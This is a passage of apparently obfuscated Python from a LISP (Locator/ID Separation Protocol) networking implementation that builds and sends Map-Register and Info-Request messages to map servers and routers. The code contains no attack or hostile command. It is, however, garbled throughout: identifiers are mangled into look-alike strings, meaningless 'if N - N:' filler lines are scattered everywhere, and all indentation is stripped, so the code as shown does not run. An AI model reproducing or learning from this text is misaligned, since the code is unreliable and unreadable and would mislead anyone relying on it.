i1Ii = True if i1I1ii11i1Iii == "yes" else False
if 61 - 61: oo - II11iiII . iiiiIi11i / II11iiII + OoO0O00
if ( oOooOo0 == "refresh-registrations" ) :
ii111iI1iIi1 = True if i1I1ii11i1Iii == "yes" else False
if 5 - 5: Oo + Oo / O0 * OoO0O00 - II11iiII % Oo
if ( oOooOo0 == "want-map-notify" ) :
OOO = True if i1I1ii11i1Iii == "yes" else False
if 15 - 15: i11iIiiIii % o0000oOoOoO0o . OoO0O00 + oOoO0oo0OOOo
if ( oOooOo0 == "site-id" ) :
oo0OOo0 = int ( i1I1ii11i1Iii )
if 61 - 61: OoO0O00 * oOoO0oo0OOOo % OoO0O00 - i1IIi - iIii1I11I1II1
if ( oOooOo0 == "encryption-key" ) :
O0ooO0Oo00o = lisp . lisp_parse_auth_key ( i1I1ii11i1Iii )
I11IiI = O0ooO0Oo00o . keys ( ) [ 0 ]
O0ooO0Oo00o = O0ooO0Oo00o [ I11IiI ]
if 74 - 74: oOoO0oo0OOOo + II111iiii / ooOO00oOo
if 100 - 100: oOo0O0Ooo * iIii1I11I1II1
if 86 - 86: ooOO00oOo * II11iiII . i1I1ii1II1iII
if 32 - 32: Ooo00oOo00o . oooO0oo0oOOOO * OoOO0ooOOoo0O
if 93 - 93: Ooo00oOo00o % i1IIi . o0000oOoOoO0o . i11iIiiIii
if 56 - 56: oOoO0oo0OOOo % O0 - oo
O0O0O = None
for oOOoo0Oo in ii11IIII11I :
if ( oOOoo0Oo == "" ) : continue
O0O0O = lisp . lisp_ms ( oOOoo0Oo , None , oO0Oo , i1Iii1i1I , oOooOOOoOo , OOoO00 ,
IiI111111IIII , i1Ii , ii111iI1iIi1 , OOO , oo0OOo0 , I11IiI , O0ooO0Oo00o )
if 100 - 100: o0000oOoOoO0o - O0 % iiiiIi11i * II11iiII + oo
for Oo0O0oooo in OOooo :
if ( Oo0O0oooo == "" ) : continue
O0O0O = lisp . lisp_ms ( None , Oo0O0oooo , oO0Oo , i1Iii1i1I , oOooOOOoOo , OOoO00 ,
IiI111111IIII , i1Ii , ii111iI1iIi1 , OOO , oo0OOo0 , I11IiI , O0ooO0Oo00o )
if 33 - 33: o0oo0o + i1I1ii1II1iII * iiiiIi11i / iIii1I11I1II1 - oo
if 54 - 54: o0oo0o / II11iiII . iiiiIi11i % i1I1ii1II1iII
if 57 - 57: i11iIiiIii . oOoO0oo0OOOo - o0000oOoOoO0o - iiiiIi11i + oOo0O0Ooo
if 63 - 63: oOo0O0Ooo * i1I1ii1II1iII
if 69 - 69: O0 . ooOO00oOo
if 49 - 49: oo - OoOO0ooOOoo0O
OoOOoOooooOOo = ( len ( lisp . lisp_map_servers_list ) == 1 )
if ( OoOOoOooooOOo ) :
O0O0O = lisp . lisp_map_servers_list . values ( ) [ 0 ]
oOOoo00O0O = threading . Timer ( 2 , oOo0O ,
[ O0O0O . map_server ] )
oOOoo00O0O . start ( )
else :
if 52 - 52: i11iIiiIii / Ooo00oOo00o * Oo
if 22 - 22: oOo0O0Ooo . II11iiII * oOo0O0Ooo
if 54 - 54: oooO0oo0oOOOO + o0000oOoOoO0o % ooOO00oOo + OoooooooOO - O0 - Ooo00oOo00o
if 77 - 77: II11iiII * iIii1I11I1II1
if 98 - 98: oo % o0000oOoOoO0o * OoooooooOO
if 51 - 51: iIii1I11I1II1 . oOo0O0Ooo / iiiiIi11i + Ooo00oOo00o
if 33 - 33: Oo . II111iiii % i1I1ii1II1iII + Ooo00oOo00o
if 71 - 71: OoO0O00 % II11iiII
if ( lisp . lisp_nat_traversal ) : return
if ( O0O0O and len ( lisp . lisp_db_list ) > 0 ) :
O00oO000O0O ( Oo0o0000o0o0 , None , None , O0O0O , False )
if 18 - 18: i1I1ii1II1iII - II11iiII . o0oo0o . iIii1I11I1II1
if 2 - 2: II11iiII . ooOO00oOo
if 78 - 78: OoOO0ooOOoo0O * iIii1I11I1II1 . oo / Ooo00oOo00o - OoooooooOO / o0oo0o
if 35 - 35: OoOO0ooOOoo0O % II11iiII - iiiiIi11i
if 20 - 20: i1IIi - Oo
if 30 - 30: OoOO0ooOOoo0O / oo
if 35 - 35: II111iiii % II11iiII . Oo + Oo % II111iiii % II111iiii
if ( len ( lisp . lisp_db_list ) > 0 ) :
if ( i1 != None and
i1 . is_alive ( ) ) : return
if 72 - 72: II111iiii + i1IIi + Ooo00oOo00o
i1 = threading . Timer ( 5 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
i1 . start ( )
if 94 - 94: iiiiIi11i . i1IIi - Ooo00oOo00o % O0 - ooOO00oOo
return
if 72 - 72: o0000oOoOoO0o
if 1 - 1: ooOO00oOo * oooO0oo0oOOOO * OoooooooOO + Oo
if 33 - 33: O0 * Ooo00oOo00o - o0oo0o % o0oo0o
if 18 - 18: o0oo0o / OoO0O00 * o0oo0o + o0oo0o * i11iIiiIii * oOoO0oo0OOOo
if 11 - 11: Oo / oOo0O0Ooo - oooO0oo0oOOOO * OoooooooOO + OoooooooOO . oOo0O0Ooo
if 26 - 26: o0000oOoOoO0o % oOoO0oo0OOOo
if 76 - 76: oooO0oo0oOOOO * i1I1ii1II1iII
def ooooooo00o ( kv_pairs ) :
iiiIIi1II = [ ]
o0oooOO00 = None
iiIiii1IIIII = None
oO0Oo = "all"
if 67 - 67: o0000oOoOoO0o / oooO0oo0oOOOO
for oOooOo0 in kv_pairs . keys ( ) :
i1I1ii11i1Iii = kv_pairs [ oOooOo0 ]
if ( oOooOo0 == "group-name" ) :
iiIiIIIiiI = i1I1ii11i1Iii
if 12 - 12: O0 - Ooo00oOo00o
if ( oOooOo0 == "group-prefix" ) :
if ( o0oooOO00 == None ) :
o0oooOO00 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 81 - 81: oOo0O0Ooo - oOo0O0Ooo . i1I1ii1II1iII
o0oooOO00 . store_prefix ( i1I1ii11i1Iii )
if 73 - 73: OoOO0ooOOoo0O % i11iIiiIii - oo
if ( oOooOo0 == "instance-id" ) :
if ( o0oooOO00 == None ) :
o0oooOO00 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 7 - 7: O0 * i11iIiiIii * o0000oOoOoO0o + Oo % ooOO00oOo - Oo
o0oooOO00 . instance_id = int ( i1I1ii11i1Iii )
if 39 - 39: OoO0O00 * II11iiII % II11iiII - OoooooooOO + Ooo00oOo00o - OoOO0ooOOoo0O
if ( oOooOo0 == "ms-name" ) :
oO0Oo = i1I1ii11i1Iii [ 0 ]
if 23 - 23: i11iIiiIii
if ( oOooOo0 == "address" ) :
for II1iIi11 in i1I1ii11i1Iii :
if ( II1iIi11 != "" ) : iiiIIi1II . append ( II1iIi11 )
if 12 - 12: o0000oOoOoO0o + i11iIiiIii * iIii1I11I1II1 / oOoO0oo0OOOo . OoOO0ooOOoo0O
if 5 - 5: i1IIi + oooO0oo0oOOOO / Ooo00oOo00o . i1I1ii1II1iII / OoOO0ooOOoo0O
if ( oOooOo0 == "rle-address" ) :
if ( iiIiii1IIIII == None ) :
iiIiii1IIIII = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
if 32 - 32: oo % iIii1I11I1II1 / i1IIi - oo
iiIiii1IIIII . store_address ( i1I1ii11i1Iii )
if 7 - 7: o0oo0o * ooOO00oOo - Oo + II11iiII * oo % ooOO00oOo
if 15 - 15: oOo0O0Ooo % oo * OoOO0ooOOoo0O
o0OO0oOO0O0 = lisp . lisp_group_mapping ( iiIiIIIiiI , oO0Oo , o0oooOO00 , iiiIIi1II ,
iiIiii1IIIII )
o0OO0oOO0O0 . add_group ( )
return
if 81 - 81: Oo - iIii1I11I1II1 - i1IIi / o0oo0o - O0 * OoOO0ooOOoo0O
if 20 - 20: iiiiIi11i % oooO0oo0oOOOO
if 19 - 19: oOoO0oo0OOOo % oooO0oo0oOOOO + Oo / o0oo0o . Oo
if 12 - 12: i1IIi + i1IIi - oOoO0oo0OOOo * OoO0O00 % OoO0O00 - II111iiii
if 52 - 52: Oo . i1I1ii1II1iII + o0oo0o
if 38 - 38: i1IIi - II111iiii . o0oo0o
if 58 - 58: oo . i1I1ii1II1iII + oOo0O0Ooo
def O00OO ( quiet , db , eid , group , ttl ) :
if 17 - 17: OoOO0ooOOoo0O / o0oo0o + iiiiIi11i - i11iIiiIii . i1I1ii1II1iII
if 95 - 95: ooOO00oOo % i1IIi * i11iIiiIii % OoO0O00 - iiiiIi11i
if 67 - 67: oOo0O0Ooo + oOoO0oo0OOOo . Ooo00oOo00o . II111iiii
if 98 - 98: i1I1ii1II1iII
if 68 - 68: iIii1I11I1II1 * iIii1I11I1II1 . Ooo00oOo00o / II111iiii % OoO0O00
if 38 - 38: Oo - II11iiII / i1I1ii1II1iII
if 66 - 66: O0 % oOoO0oo0OOOo + i11iIiiIii . oOo0O0Ooo / o0000oOoOoO0o + oOoO0oo0OOOo
if 86 - 86: Ooo00oOo00o
i1Iii11Ii1i1 = { }
for OOooo0O0o0 in db . rloc_set :
if ( OOooo0O0o0 . translated_rloc . is_null ( ) ) : continue
if 14 - 14: Ooo00oOo00o % O0 * i1I1ii1II1iII + o0000oOoOoO0o + OoO0O00 * o0000oOoOoO0o
for iII1I1IiI11ii in lisp . lisp_rtr_list :
OooooOoooO = lisp . lisp_rtr_list [ iII1I1IiI11ii ]
if ( lisp . lisp_register_all_rtrs == False and OooooOoooO == None ) :
lisp . lprint ( " Exclude unreachable RTR {}" . format ( lisp . red ( iII1I1IiI11ii , False ) ) )
if 56 - 56: OoO0O00 . oOoO0oo0OOOo . oo
continue
if 39 - 39: O0 + o0oo0o
if ( OooooOoooO == None ) : continue
i1Iii11Ii1i1 [ iII1I1IiI11ii ] = OooooOoooO
if 91 - 91: OoooooooOO - iIii1I11I1II1 + oOo0O0Ooo / ooOO00oOo . oOo0O0Ooo + O0
break
if 26 - 26: oOoO0oo0OOOo - OoooooooOO
if 11 - 11: oo * iiiiIi11i
o000oo = 0
o00o0 = ""
for II1I in [ eid . instance_id ] + eid . iid_list :
II1I1I1Ii = lisp . lisp_eid_record ( )
if 70 - 70: ooOO00oOo % iiiiIi11i + II11iiII / o0000oOoOoO0o % O0
II1I1I1Ii . rloc_count = len ( db . rloc_set ) + len ( i1Iii11Ii1i1 )
II1I1I1Ii . authoritative = True
II1I1I1Ii . record_ttl = ttl
II1I1I1Ii . eid . copy_address ( eid )
II1I1I1Ii . eid . instance_id = II1I
II1I1I1Ii . eid . iid_list = [ ]
II1I1I1Ii . group . copy_address ( group )
if 100 - 100: Ooo00oOo00o + II11iiII * Ooo00oOo00o
o00o0 += II1I1I1Ii . encode ( )
if ( not quiet ) :
oOOo0OOOo00O = eid . print_prefix ( )
lisp . lprint ( " EID-prefix {} for ms-name '{}'" . format ( lisp . green ( oOOo0OOOo00O , False ) , db . use_ms_name ) )
if 76 - 76: i11iIiiIii + Ooo00oOo00o / oOoO0oo0OOOo - ooOO00oOo - o0000oOoOoO0o + oOoO0oo0OOOo
II1I1I1Ii . print_record ( " " , False )
if 51 - 51: iIii1I11I1II1 . Oo + iIii1I11I1II1
if 95 - 95: oo
for OOooo0O0o0 in db . rloc_set :
iII1ii1 = lisp . lisp_rloc_record ( )
iII1ii1 . store_rloc_entry ( OOooo0O0o0 )
iII1ii1 . local_bit = OOooo0O0o0 . rloc . is_local ( )
iII1ii1 . reach_bit = True
o00o0 += iII1ii1 . encode ( )
if ( not quiet ) : iII1ii1 . print_record ( " " )
if 12 - 12: II11iiII - Oo . OoooooooOO / oOoO0oo0OOOo . i1IIi * ooOO00oOo
if 19 - 19: i11iIiiIii + OoooooooOO - OoO0O00 - OoOO0ooOOoo0O
if 21 - 21: O0 % oooO0oo0oOOOO . oo / II111iiii + oooO0oo0oOOOO
if 53 - 53: iiiiIi11i - oo - iiiiIi11i * i1I1ii1II1iII
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: II11iiII / Ooo00oOo00o
for OooooOoooO in i1Iii11Ii1i1 . values ( ) :
iII1ii1 = lisp . lisp_rloc_record ( )
iII1ii1 . rloc . copy_address ( OooooOoooO )
iII1ii1 . priority = 254
iII1ii1 . rloc_name = "RTR"
iII1ii1 . weight = 0
iII1ii1 . mpriority = 255
iII1ii1 . mweight = 0
iII1ii1 . local_bit = False
iII1ii1 . reach_bit = True
o00o0 += iII1ii1 . encode ( )
if ( not quiet ) : iII1ii1 . print_record ( " RTR " )
if 42 - 42: OoO0O00
if 19 - 19: iiiiIi11i % oOoO0oo0OOOo * iIii1I11I1II1 + oo
if 46 - 46: OoO0O00
if 1 - 1: i1I1ii1II1iII
if 97 - 97: II11iiII + i1I1ii1II1iII + O0 + i11iIiiIii
o000oo += 1
if 77 - 77: Ooo00oOo00o / OoooooooOO
return ( o00o0 , o000oo )
if 46 - 46: Ooo00oOo00o % iIii1I11I1II1 . i1I1ii1II1iII % i1I1ii1II1iII + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * o0000oOoOoO0o % Oo / ooOO00oOo
if 35 - 35: Oo + i1IIi % oOoO0oo0OOOo % OoOO0ooOOoo0O + iiiiIi11i
if 17 - 17: i1IIi
if 21 - 21: OoO0O00
if 29 - 29: OoOO0ooOOoo0O / II111iiii / Oo * II11iiII
if 10 - 10: o0oo0o % oooO0oo0oOOOO * oooO0oo0oOOOO . OoOO0ooOOoo0O / o0000oOoOoO0o % II11iiII
if 49 - 49: ooOO00oOo / iiiiIi11i + O0 * Ooo00oOo00o
def O00oO000O0O ( lisp_sockets , ttl , eid_only , ms_only , refresh ) :
if 28 - 28: Oo + i11iIiiIii / OoOO0ooOOoo0O % oOo0O0Ooo % OoO0O00 - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: oOoO0oo0OOOo - oo + II11iiII
if 5 - 5: o0000oOoOoO0o
if ( eid_only != None ) :
iIi1i1iIi1iI = 1
else :
iIi1i1iIi1iI = lisp . lisp_db_list_length ( )
if ( iIi1i1iIi1iI == 0 ) : return
if 26 - 26: OoooooooOO * oo + II11iiII
if 24 - 24: i11iIiiIii % iIii1I11I1II1 + II11iiII / i11iIiiIii
lisp . lprint ( "Build Map-Register for {} database-mapping entries" . format ( iIi1i1iIi1iI ) )
if 70 - 70: ooOO00oOo * O0 . OoOO0ooOOoo0O + oo . oooO0oo0oOOOO
if 14 - 14: iIii1I11I1II1 % iIii1I11I1II1 * i11iIiiIii - ooOO00oOo - OoOO0ooOOoo0O
if 63 - 63: ooOO00oOo
if 69 - 69: iIii1I11I1II1 . oOoO0oo0OOOo % Oo + iIii1I11I1II1 / O0 / oOoO0oo0OOOo
if 61 - 61: II11iiII % II11iiII * Ooo00oOo00o / Ooo00oOo00o
o0 = ( iIi1i1iIi1iI > 12 )
if 96 - 96: oOo0O0Ooo . Ooo00oOo00o - Oo
if 99 - 99: oooO0oo0oOOOO . OoO0O00 - o0000oOoOoO0o % o0000oOoOoO0o * O0 . II111iiii
if 4 - 4: o0000oOoOoO0o
if 51 - 51: ooOO00oOo - O0 % iiiiIi11i - II111iiii
if 31 - 31: i1I1ii1II1iII / OoO0O00 - i1I1ii1II1iII - II11iiII
I1iiIIIi11 = { }
for O0O0O in lisp . lisp_map_servers_list . values ( ) :
if ( ms_only != None and O0O0O != ms_only ) : continue
I1iiIIIi11 [ O0O0O . ms_name ] = [ ]
if 12 - 12: OoooooooOO % Ooo00oOo00o * OoOO0ooOOoo0O % iIii1I11I1II1 / o0000oOoOoO0o
if 27 - 27: i11iIiiIii % II111iiii % OoOO0ooOOoo0O . O0 - OoO0O00 + oOo0O0Ooo
if 57 - 57: iIii1I11I1II1 / OoOO0ooOOoo0O - i1IIi
if 51 - 51: oooO0oo0oOOOO
if 25 - 25: OoooooooOO + oooO0oo0oOOOO * oOoO0oo0OOOo
OoO0ooO = lisp . lisp_map_register ( )
OoO0ooO . nonce = 0xaabbccdddfdfdf00
OoO0ooO . xtr_id_present = True
if 51 - 51: i1I1ii1II1iII / Oo * oOo0O0Ooo . i1I1ii1II1iII / oOoO0oo0OOOo / i11iIiiIii
if ( ttl == None ) : ttl = lisp . LISP_REGISTER_TTL
if 21 - 21: iiiiIi11i / oOoO0oo0OOOo + o0000oOoOoO0o + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + i1I1ii1II1iII + Oo * i11iIiiIii
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + OoOO0ooOOoo0O * o0oo0o . oooO0oo0oOOOO
if 52 - 52: Oo + O0 . i1I1ii1II1iII . oOoO0oo0OOOo . ooOO00oOo
for oo000 in lisp . lisp_db_list :
if 32 - 32: i1IIi . o0000oOoOoO0o
if 59 - 59: OoooooooOO
if 47 - 47: Oo - oo / II111iiii
if 12 - 12: II11iiII
if ( I1iiIIIi11 . has_key ( oo000 . use_ms_name ) == False ) : continue
if 83 - 83: i1I1ii1II1iII . O0 / OoO0O00 / II11iiII - II111iiii
oO0oO0 = I1iiIIIi11 [ oo000 . use_ms_name ]
if ( oO0oO0 == [ ] ) :
oO0oO0 = [ "" , 0 ]
I1iiIIIi11 [ oo000 . use_ms_name ] . append ( oO0oO0 )
else :
oO0oO0 = I1iiIIIi11 [ oo000 . use_ms_name ] [ - 1 ]
if 14 - 14: i1I1ii1II1iII
if 99 - 99: i1I1ii1II1iII
if 38 - 38: oOoO0oo0OOOo - i1I1ii1II1iII / O0 . o0oo0o
if 45 - 45: o0oo0o
if 83 - 83: oOo0O0Ooo . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / oooO0oo0oOOOO / i11iIiiIii
if 62 - 62: ooOO00oOo / oOoO0oo0OOOo
if 7 - 7: OoooooooOO . oooO0oo0oOOOO
if 53 - 53: o0000oOoOoO0o % o0000oOoOoO0o * Ooo00oOo00o + oOo0O0Ooo
if 92 - 92: OoooooooOO + i1IIi / o0000oOoOoO0o * O0
o00o0 = ""
if ( oo000 . dynamic_eid_configured ( ) ) :
for O00oOo00o0o in oo000 . dynamic_eids . values ( ) :
O00oO0 = O00oOo00o0o . dynamic_eid
if ( eid_only == None or eid_only . is_exact_match ( O00oO0 ) ) :
O0Oo00OoOo , o000oo = O00OO ( o0 , oo000 ,
O00oO0 , oo000 . group , ttl )
o00o0 += O0Oo00OoOo
oO0oO0 [ 1 ] += o000oo
if 24 - 24: i11iIiiIii - o0oo0o
if 21 - 21: OoOO0ooOOoo0O
else :
if ( eid_only == None ) :
o00o0 , o000oo = O00OO ( o0 , oo000 ,
oo000 . eid , oo000 . group , ttl )
oO0oO0 [ 1 ] += o000oo
if 92 - 92: i11iIiiIii / o0oo0o - i1I1ii1II1iII % Oo * o0oo0o + OoO0O00
if 11 - 11: OoooooooOO . o0oo0o
if 80 - 80: OoooooooOO - II11iiII * o0000oOoOoO0o * oOoO0oo0OOOo / oo / II11iiII
if 13 - 13: o0oo0o * Oo + i11iIiiIii * o0oo0o - Oo
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * oooO0oo0oOOOO
if 9 - 9: oooO0oo0oOOOO - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
oO0oO0 [ 0 ] += o00o0
if 39 - 39: oooO0oo0oOOOO * OoO0O00 + iIii1I11I1II1 - oooO0oo0oOOOO + II11iiII
if ( oO0oO0 [ 1 ] == 20 ) :
oO0oO0 = [ "" , 0 ]
I1iiIIIi11 [ oo000 . use_ms_name ] . append ( oO0oO0 )
if 69 - 69: O0
if 85 - 85: Oo / O0
if 18 - 18: Ooo00oOo00o % O0 * oOoO0oo0OOOo
if 62 - 62: o0oo0o . oooO0oo0oOOOO . OoooooooOO
if 11 - 11: II11iiII / OoOO0ooOOoo0O
if 73 - 73: i1IIi / i11iIiiIii
for O0O0O in lisp . lisp_map_servers_list . values ( ) :
if ( ms_only != None and O0O0O != ms_only ) : continue
if 58 - 58: OoO0O00 . II111iiii + iiiiIi11i - i11iIiiIii / II111iiii / O0
for oO0oO0 in I1iiIIIi11 [ O0O0O . ms_name ] :
if 85 - 85: oOo0O0Ooo + II11iiII
if 10 - 10: oooO0oo0oOOOO / ooOO00oOo + oOo0O0Ooo / i1IIi
if 27 - 27: o0000oOoOoO0o
if 67 - 67: oo
OoO0ooO . record_count = oO0oO0 [ 1 ]
if ( OoO0ooO . record_count == 0 ) : continue
if 55 - 55: oOoO0oo0OOOo - i1I1ii1II1iII * Ooo00oOo00o + oOo0O0Ooo * oOo0O0Ooo * O0
OoO0ooO . nonce += 1
OoO0ooO . alg_id = O0O0O . alg_id
OoO0ooO . key_id = O0O0O . key_id
OoO0ooO . proxy_reply_requested = O0O0O . proxy_reply
OoO0ooO . merge_register_requested = O0O0O . merge_registrations
OoO0ooO . map_notify_requested = O0O0O . want_map_notify
OoO0ooO . xtr_id = O0O0O . xtr_id
OoO0ooO . site_id = O0O0O . site_id
OoO0ooO . encrypt_bit = ( O0O0O . ekey != None )
if ( O0O0O . refresh_registrations ) :
OoO0ooO . map_register_refresh = refresh
if 91 - 91: o0oo0o - II11iiII % iIii1I11I1II1 - OoooooooOO % Oo
if ( O0O0O . ekey != None ) : OoO0ooO . encryption_key_id = O0O0O . ekey_id
OO0 = OoO0ooO . encode ( )
OoO0ooO . print_map_register ( )
if 44 - 44: i1I1ii1II1iII - o0oo0o / O0 * OoO0O00 + II111iiii / oOo0O0Ooo
if 88 - 88: Ooo00oOo00o - ooOO00oOo + oOoO0oo0OOOo . o0oo0o % o0oo0o
if 57 - 57: II111iiii
if 54 - 54: OoO0O00 + iiiiIi11i + i11iIiiIii
if 28 - 28: iiiiIi11i
ooo000o0ooO0 = OoO0ooO . encode_xtr_id ( "" )
o00o0 = oO0oO0 [ 0 ]
OO0 = OO0 + o00o0 + ooo000o0ooO0
if 10 - 10: Oo . i1I1ii1II1iII + ooOO00oOo / OoooooooOO - i1I1ii1II1iII / OoOO0ooOOoo0O
O0O0O . map_registers_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , OO0 , OoO0ooO , O0O0O )
time . sleep ( .001 )
if 76 - 76: Ooo00oOo00o % oo . iIii1I11I1II1 - oooO0oo0oOOOO * OoooooooOO . i1I1ii1II1iII
if 84 - 84: o0oo0o + OoOO0ooOOoo0O
if 28 - 28: iiiiIi11i - i11iIiiIii . oOoO0oo0OOOo + oooO0oo0oOOOO / oOoO0oo0OOOo
if 35 - 35: oooO0oo0oOOOO
if 75 - 75: OoO0O00 / oOoO0oo0OOOo . oooO0oo0oOOOO * II11iiII - II111iiii
O0O0O . resolve_dns_name ( )
if 41 - 41: o0000oOoOoO0o
if 77 - 77: o0oo0o
if 65 - 65: II111iiii . oo % iiiiIi11i * ooOO00oOo
if 38 - 38: oOo0O0Ooo / i1I1ii1II1iII % OoO0O00
if 11 - 11: i1I1ii1II1iII - iiiiIi11i + II111iiii - iIii1I11I1II1
if ( ms_only != None and O0O0O == ms_only ) : break
if 7 - 7: oooO0oo0oOOOO - OoOO0ooOOoo0O / II111iiii * o0000oOoOoO0o . i1I1ii1II1iII * i1I1ii1II1iII
return
if 61 - 61: OoOO0ooOOoo0O % Oo - ooOO00oOo / OoO0O00
if 4 - 4: OoooooooOO - i1IIi % o0000oOoOoO0o - II11iiII * Ooo00oOo00o
if 85 - 85: OoooooooOO * iIii1I11I1II1 . i1I1ii1II1iII / OoooooooOO % oo % O0
if 36 - 36: o0000oOoOoO0o / II111iiii / oooO0oo0oOOOO / oooO0oo0oOOOO + oOoO0oo0OOOo
if 95 - 95: oooO0oo0oOOOO
if 51 - 51: II111iiii + oooO0oo0oOOOO . i1IIi . oOoO0oo0OOOo + oOo0O0Ooo * oo
if 72 - 72: iiiiIi11i + iiiiIi11i / II111iiii . OoooooooOO % o0000oOoOoO0o
if 49 - 49: iiiiIi11i . ooOO00oOo - OoO0O00 * OoooooooOO . OoO0O00
if 2 - 2: OoooooooOO % II11iiII
def oOo0O ( ms ) :
global oOOoo00O0O
global i1111
if 63 - 63: oo % iIii1I11I1II1
lisp . lisp_set_exception ( )
if 39 - 39: i1I1ii1II1iII / II111iiii / oOoO0oo0OOOo % oo
if 89 - 89: o0oo0o + OoooooooOO + o0oo0o * i1IIi + iIii1I11I1II1 % OoOO0ooOOoo0O
if 59 - 59: II11iiII + i11iIiiIii
if 88 - 88: i11iIiiIii - Oo
if 67 - 67: II11iiII . OoO0O00 + oOo0O0Ooo - OoooooooOO
OOOoO = [ i1111 , i1111 , I11 ]
lisp . lisp_build_info_requests ( OOOoO , ms , lisp . LISP_CTRL_PORT )
if 14 - 14: OoOO0ooOOoo0O . iIii1I11I1II1 . OoooooooOO . II111iiii / Ooo00oOo00o
if 21 - 21: i11iIiiIii / i1IIi + oo * II11iiII . o0oo0o
if 84 - 84: O0 . OoOO0ooOOoo0O - II111iiii . Oo / II111iiii
if 47 - 47: OoooooooOO
if 4 - 4: oo % OoOO0ooOOoo0O
I1 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) == None )
for OooooOoooO in lisp . lisp_rtr_list . values ( ) :
if ( OooooOoooO == None ) : continue
if ( OooooOoooO . is_private_address ( ) and I1 == False ) :
oOO0o0 = lisp . red ( OooooOoooO . print_address_no_iid ( ) , False )
lisp . lprint ( "Skip over RTR private address {}" . format ( oOO0o0 ) )
continue
if 19 - 19: II111iiii * oooO0oo0oOOOO + o0000oOoOoO0o
lisp . lisp_build_info_requests ( OOOoO , OooooOoooO , lisp . LISP_DATA_PORT )
if 65 - 65: II11iiII . o0oo0o . ooOO00oOo . i1I1ii1II1iII - II11iiII
if 19 - 19: i11iIiiIii + i1I1ii1II1iII % Oo
if 14 - 14: ooOO00oOo . II111iiii . OoOO0ooOOoo0O / o0000oOoOoO0o % oOoO0oo0OOOo - Oo
if 67 - 67: OoOO0ooOOoo0O - II11iiII . i1IIi
if 35 - 35: i1I1ii1II1iII + Oo - iiiiIi11i . i1I1ii1II1iII . oooO0oo0oOOOO
if 87 - 87: oOo0O0Ooo
oOOoo00O0O . cancel ( )
oOOoo00O0O = threading . Timer ( lisp . LISP_INFO_INTERVAL ,
oOo0O , [ None ] )
oOOoo00O0O . start ( )
return
if 25 - 25: i1IIi . ooOO00oOo - oOo0O0Ooo / ooOO00oOo % ooOO00oOo * iIii1I11I1II1
if 50 - 50: ooOO00oOo . i11iIiiIii - iiiiIi11i . iiiiIi11i
if 31 - 31: II11iiII / OoO0O00 * i1IIi . oOo0O0Ooo
if 57 - 57: II11iiII + iIii1I11I1II1 % i1IIi % oo
if 83 - 83: Ooo00oOo00o / i11iIiiIii % iIii1I11I1II1 . OoOO0ooOOoo0O % iiiiIi11i . OoooooooOO
if 94 - 94: o0000oOoOoO0o + iIii1I11I1II1 % ooOO00oOo
if 93 - 93: o0000oOoOoO0o - II11iiII + iIii1I11I1II1 * Ooo00oOo00o + o0oo0o . i1I1ii1II1iII
def ooO0o0Oo ( lisp_sockets ) :
global o0oOoO00o
global i1111
if 49 - 49: OoooooooOO * OoOO0ooOOoo0O - OoO0O00 . iiiiIi11i
lisp . lisp_set_exception ( )
if 89 - 89: Oo + o0000oOoOoO0o * Oo / Oo
if 46 - 46: ooOO00oOo
if 71 - 71: OoOO0ooOOoo0O / OoOO0ooOOoo0O * iiiiIi11i * iiiiIi11i / II111iiii
if 35 - 35: II11iiII * Ooo00oOo00o * oo % OoO0O00 . oOo0O0Ooo
O00oO000O0O ( lisp_sockets , None , None , None , True )
if 58 - 58: OoOO0ooOOoo0O + II111iiii * i1I1ii1II1iII * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % OoOO0ooOOoo0O * OoOO0ooOOoo0O * oOoO0oo0OOOo
if 24 - 24: II111iiii % o0oo0o - Oo + oo * oOoO0oo0OOOo
if 2 - 2: o0000oOoOoO0o - oooO0oo0oOOOO
if ( lisp . lisp_l2_overlay ) :
OO0OO00oo0 = [ None , "ffff-ffff-ffff" , True ]
iIIIiIii ( lisp_sockets , [ OO0OO00oo0 ] )
if 71 - 71: OoooooooOO
if 33 - 33: o0oo0o
if 62 - 62: oOoO0oo0OOOo + o0000oOoOoO0o + i1IIi / OoooooooOO
if 7 - 7: Ooo00oOo00o + i1IIi . oo / OoO0O00
if 22 - 22: Oo - Oo % II11iiII . o0oo0o + iiiiIi11i
if ( o0oOoO00o ) : o0oOoO00o . cancel ( )
o0oOoO00o = threading . Timer ( oOOoo ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
o0oOoO00o . start ( )
return
if 63 - 63: oo % o0oo0o * Ooo00oOo00o + o0oo0o / OoO0O00 % i1I1ii1II1iII
if 45 - 45: oooO0oo0oOOOO
if 20 - 20: OoooooooOO * Ooo00oOo00o * O0 . II11iiII
if 78 - 78: iIii1I11I1II1 + OoOO0ooOOoo0O - o0000oOoOoO0o * o0oo0o - OoooooooOO % oOo0O0Ooo
if 34 - 34: O0
if 80 - 80: i1IIi - OoO0O00 / ooOO00oOo - i11iIiiIii
if 68 - 68: iiiiIi11i - oOoO0oo0OOOo % O0 % o0oo0o
if 11 - 11: O0 / ooOO00oOo % II11iiII + Ooo00oOo00o + iIii1I11I1II1
if 40 - 40: Oo - II11iiII . o0000oOoOoO0o * OoO0O00 % o0oo0o
def OoO ( group_str , group_mapping ) :
II1I = group_mapping . group_prefix . instance_id
O00OOOo0 = group_mapping . group_prefix . mask_len
i1111IIiii1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , group_str , 32 , II1I )
if ( i1111IIiii1 . is_more_specific ( group_mapping . group_prefix ) ) : return ( O00OOOo0 )
return ( - 1 )
if 49 - 49: II11iiII . iIii1I11I1II1
if 62 - 62: oOo0O0Ooo / oo - oOoO0oo0OOOo - oo + i11iIiiIii + i1IIi
